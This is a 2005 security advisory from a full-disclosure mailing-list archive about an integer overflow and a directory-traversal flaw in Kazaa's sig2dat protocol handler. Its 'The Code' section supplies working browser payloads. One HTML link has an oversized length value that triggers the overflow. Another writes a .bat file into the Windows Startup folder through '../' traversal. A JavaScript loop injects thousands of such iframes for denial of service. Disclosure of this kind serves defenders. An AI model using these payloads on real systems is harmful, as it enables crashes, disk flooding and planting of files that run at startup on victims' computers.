lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <001201c4fcd4$d32e9c10$f85ab350@noone>
From: theinsider at 012.net.il (Rafel Ivgi, The-Insider)
Subject: Kazaa Sig2Dat Protocol Remote Integer Overflow
 and Denial Of Service by creating files in arbitrary locations

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:   Kazaa
Vendors:       http://www.kazaa.com
Versions:       kazaa lite k++(probably all others too...)
Platforms:      Windows
Bug:              Sig2Dat Protocol Remote Integer Overflow and
                     Denial Of Service by creating files in arbitrary
locations
Exploitation:   Remote With Browser
Date:             17 Jan 2005
Author:          Rafel Ivgi, The-Insider
E-Mail:          the_insider@...l.com
Website:        http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Kazaa is currently the world?s most common P2P file sharing application.
When installing Kazaa a new protocol is installed named ?sig2dat?.
This protocol contain an integer overflow vulnerability which may cause
a crash and may allow remote execution of code. There is another
vulnerability in the ?File:? parameter which allows creating files in
arbitrary locations and committing Denial Of Service.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

The sig2dat protocol syntax:
Sig2dat://<filename>%7c<file length in bytes>< file length in
kilobytes>%7c<HASH>%7c

The vulnerable parameter is the file ?Length? (in bytes). Specifying a
numeric value bigger than a 999999999.

Successful exploiting of this vulnerability may allow remote code execution.

There is another vulnerability in the ?File:? parameter. It allows creation
of files in arbitrary locations within the same partition as the shared
folder,
using the classic directory transversal technique ?../?.

For Example:
<A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/
Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEf
m3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A>


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

1) <A HREF="sig2dat://%7CFile:dev-catz5%28.bin%7CLength:99999999999999999999
9999999%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK
HERE</A>
*********************************************************************
2) <A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start
Menu
/Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEf
m
3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A>
*********************************************************************
3) <script>
var i
for (i=1;i<10000;i++)
{
mylocation="<iframe src='sig2dat://%7CFile:../../../../../../Docume~1/All
Users
/Start
Menu/Programs/Startup/cool"+i+".bat%7CLength:373236528%20Bytes,364489KB%
7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/'></iframe>";
document.write(mylocation);
}
</script>


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Scripts and Codes will make me D.O.S , but they will never HACK me."


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ